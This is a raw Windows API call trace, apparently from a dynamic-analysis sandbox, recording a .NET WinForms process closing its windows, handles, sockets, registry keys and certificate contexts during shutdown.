[0077.341] NtdllDefWindowProc_W (hWnd=0x60044, Msg=0x201a, wParam=0x14, lParam=0xa87220) returned 0x0 [0077.342] PeekMessageW (in: lpMsg=0x5bf1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x5bf1d0) returned 1 [0077.342] GetMessageA (in: lpMsg=0x5bf1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x5bf1d0) returned 0 [0077.345] DestroyCursor (hCursor=0x1b00a5) returned 1 [0077.377] GetWindowLongW (hWnd=0x70030, nIndex=-20) returned 590208 [0077.377] DestroyWindow (hWnd=0x70030) returned 1 [0077.377] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0077.378] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x46, wParam=0x0, lParam=0x5bef84) returned 0x0 [0077.379] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5becb0 | out: lpwndpl=0x5becb0) returned 1 [0077.379] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x47, wParam=0x0, lParam=0x5bef84) returned 0x0 [0077.379] GetClientRect (in: hWnd=0x70030, lpRect=0x5bec60 | out: lpRect=0x5bec60) returned 1 [0077.379] GetWindowRect (in: hWnd=0x70030, lpRect=0x5bec60 | out: lpRect=0x5bec60) returned 1 [0077.379] PostThreadMessageW (idThread=0x6ac, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0077.379] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0077.380] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0077.380] DestroyWindow (hWnd=0x40212) returned 1 [0077.380] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x40212, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0077.380] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x40212, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0077.381] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x40212, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0077.389] GetCurrentThreadId () returned 0x6ac [0077.389] EnumThreadWindows (dwThreadId=0x6ac, lpfn=0x25e04b6, lParam=0x0) returned 1 [0077.389] IsWindowVisible (hWnd=0x60044) returned 0 [0077.389] IsWindowVisible (hWnd=0x8002e) returned 0 [0077.390] GetCurrentThreadId () returned 0x6ac [0077.390] GetCurrentThreadId () returned 0x6ac [0077.390] EnumThreadWindows (dwThreadId=0x6ac, lpfn=0x25e04de, lParam=0x0) returned 1 [0077.390] IsWindowVisible (hWnd=0x60044) returned 0 [0077.391] IsWindowVisible (hWnd=0x8002e) returned 0 [0077.397] OleUninitialize () [0077.397] CloseHandle (hObject=0x2f0) returned 1 [0077.397] DeactivateActCtx (dwFlags=0x0, ulCookie=0x183a0002) returned 1 [0077.398] CoGetContextToken (in: pToken=0x5bfb78 | out: pToken=0x5bfb78) returned 0x0 [0077.398] CObjectContext::QueryInterface () returned 0x0 [0077.398] CObjectContext::GetCurrentThreadType () returned 0x0 [0077.398] Release () returned 0x0 [0077.399] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0xa40738*=0x198, lpdwindex=0x5bfa1c | out: lpdwindex=0x5bfa1c) returned 0x0 Thread: id = 2 os_tid = 0x7bc Thread: id = 3 os_tid = 0xbec Thread: id = 4 os_tid = 0xda8 [0033.849] CoGetContextToken (in: pToken=0x479f934 | out: pToken=0x479f934) returned 0x800401f0 [0033.849] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0033.849] RoInitialize () returned 0x1 [0033.849] RoUninitialize () returned 0x0 [0044.421] CloseHandle (hObject=0x2cc) returned 1 [0044.421] CloseHandle (hObject=0x2dc) returned 1 [0044.421] CloseHandle (hObject=0x2d8) returned 1 [0044.421] CloseHandle (hObject=0x2e8) returned 1 [0044.422] CloseHandle (hObject=0x2d4) returned 1 [0044.422] CloseHandle (hObject=0x2d0) returned 1 [0044.422] CloseHandle (hObject=0x2e4) returned 1 [0044.422] CloseHandle (hObject=0x2e0) returned 1 [0066.697] CloseHandle (hObject=0x414) returned 1 [0066.697] CloseHandle (hObject=0x410) returned 1 [0066.698] CertFreeCertificateContext (pCertContext=0x77e1148) returned 1 [0066.698] CloseHandle (hObject=0x3fc) returned 1 [0066.698] CloseHandle (hObject=0x2cc) returned 1 [0066.698] CloseHandle (hObject=0x2dc) returned 1 [0066.698] CertFreeCertificateContext (pCertContext=0x77e11e8) returned 1 [0066.698] CloseHandle (hObject=0x2d8) returned 1 [0066.699] CloseHandle (hObject=0x418) returned 1 [0066.700] CloseHandle (hObject=0x2d0) returned 1 [0066.700] CloseHandle (hObject=0x2e4) returned 1 [0066.700] CertFreeCertificateContext (pCertContext=0x77e0a68) returned 1 [0066.701] CertFreeCertificateContext (pCertContext=0x77e0ab8) returned 1 [0066.713] CloseHandle (hObject=0x580) returned 1 [0066.713] CloseHandle (hObject=0x57c) returned 1 [0066.713] CloseHandle (hObject=0x5d0) returned 1 [0066.713] CertFreeCertificateContext (pCertContext=0x77e0ab8) returned 1 [0066.714] CloseHandle (hObject=0x51c) returned 1 [0066.714] CertCloseStore (hCertStore=0x77e86a8, dwFlags=0x0) returned 1 [0066.714] CloseHandle (hObject=0x518) returned 1 [0077.441] SetWindowLongW (hWnd=0x401f8, nIndex=-4, dwNewLong=1952448832) returned 39716326 [0077.441] SetClassLongW (hWnd=0x401f8, nIndex=-24, dwNewLong=1952448832) returned 0x25e05be [0077.442] PostMessageW (hWnd=0x401f8, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0077.442] GetModuleHandleW (lpModuleName=0x0) returned 0x3f0000 [0077.443] UnregisterClassW (lpClassName="WindowsForms10.Window.0.app.0.141b42a_r9_ad1", hInstance=0x3f0000) returned 1 [0077.443] GetModuleHandleW (lpModuleName=0x0) returned 0x3f0000 [0077.443] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.141b42a_r9_ad1", hInstance=0x3f0000) returned 0 [0077.443] EtwEventUnregister (RegHandle=0xa42420) returned 0x0 [0077.443] EtwEventUnregister (RegHandle=0xaa2940) returned 0x0 [0077.446] IsWindow (hWnd=0x60044) returned 1 [0077.446] GetModuleHandleW (lpModuleName="user32.dll") returned 0x74b70000 [0077.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x479f6d4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW\x06r\x8f…¼\x99ðùÔsXùy\x04\x01", lpUsedDefaultChar=0x0) returned 14 [0077.447] GetProcAddress (hModule=0x74b70000, lpProcName="DefWindowProcW") returned 0x74600140 [0077.447] SetWindowLongW (hWnd=0x60044, nIndex=-4, dwNewLong=1952448832) returned 39716486 [0077.448] SetClassLongW (hWnd=0x60044, nIndex=-24, dwNewLong=1952448832) returned 0x25e0686 [0077.448] IsWindow (hWnd=0x60044) returned 1 [0077.448] DestroyWindow (hWnd=0x60044) returned 0 [0077.448] PostMessageW (hWnd=0x60044, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0077.448] SetConsoleCtrlHandler (HandlerRoutine=0x25e065e, Add=0) returned 1 [0077.448] DeleteObject (ho=0x5a08062b) returned 1 [0077.464] GdipDeleteFont (font=0x4dcef48) returned 0x0 [0077.465] DeleteObject (ho=0x480a060c) returned 1 [0077.465] DestroyCursor (hCursor=0x400e1) returned 1 [0077.466] CertFreeCertificateContext (pCertContext=0x77e0e78) returned 1 [0077.466] CertFreeCertificateContext (pCertContext=0x77e0bf8) returned 1 [0077.467] CertFreeCertificateContext (pCertContext=0x77e1238) returned 1 [0077.468] CertCloseStore (hCertStore=0x77e92d8, dwFlags=0x0) returned 1 [0077.468] CertFreeCertificateContext (pCertContext=0x77e1238) returned 1 [0077.469] CloseHandle (hObject=0x2e0) returned 1 [0077.469] UnmapViewOfFile (lpBaseAddress=0x4d90000) returned 1 [0077.470] CertFreeCertificateContext (pCertContext=0x77e0dd8) returned 1 [0077.470] WinHttpCloseHandle (hInternet=0xb055e8) returned 1 [0077.472] CloseHandle (hObject=0x4c8) returned 1 [0077.472] CloseHandle (hObject=0x4c4) returned 1 [0077.472] RegCloseKey (hKey=0x4c0) returned 0x0 [0077.473] CloseHandle (hObject=0x4bc) returned 1 [0077.473] RegCloseKey (hKey=0x4b8) returned 0x0 [0077.473] CloseHandle (hObject=0x4b4) returned 1 [0077.474] RegCloseKey (hKey=0x4b0) returned 0x0 [0077.474] RegCloseKey (hKey=0x4ac) returned 0x0 [0077.474] CloseHandle (hObject=0x494) returned 1 [0077.474] setsockopt (s=0x488, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0077.475] closesocket (s=0x488) returned 0 [0077.475] CloseHandle (hObject=0x48c) returned 1 [0077.476] setsockopt (s=0x480, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0077.476] closesocket (s=0x480) returned 0 [0077.476] CloseHandle (hObject=0x484) returned 1 [0077.476] setsockopt (s=0x5c4, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0077.477] closesocket (s=0x5c4) returned 0 [0077.477] CloseHandle (hObject=0x5c8) returned 1 [0077.478] setsockopt (s=0x5b8, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0077.478] closesocket (s=0x5b8) returned 0 [0077.478] CloseHandle (hObject=0x5c0) returned 1 [0077.479] DeleteSecurityContext (phContext=0x264119c) returned 0x0 [0077.480] setsockopt (s=0x5b0, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0077.480] closesocket (s=0x5b0) returned 0 [0077.483] FreeCredentialsHandle (phCredential=0x2640fe4) returned 0x0 [0077.484] DeleteSecurityContext (phContext=0x267177c) returned 0x0 [0077.485] RegCloseKey (hKey=0x80000004) returned 0x0 [0077.490] setsockopt (s=0x51c, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0077.490] closesocket (s=0x51c) returned 0 [0077.493] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 5 os_tid = 0x60 Thread: id = 6 os_tid = 0xa60 Thread: id = 7 os_tid = 0xbb4 Thread: id = 8 os_tid = 0xe5c Thread: id = 9 os_tid = 0xf70 Thread: id = 10 os_tid = 0xf9c [0063.487] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0063.487] RoInitialize () returned 0x1 [0063.487] RoUninitialize () returned 0x0 [0063.489] ResetEvent (hEvent=0x2d4) returned 1 Thread: id = 11 os_tid = 0xf98 Thread: id = 12 os_tid = 0x39c Thread: id = 13 os_tid = 0x48c Thread: id = 14 os_tid = 0x9c0 [0077.495] SleepEx (dwMilliseconds=0x14, bAlertable=0)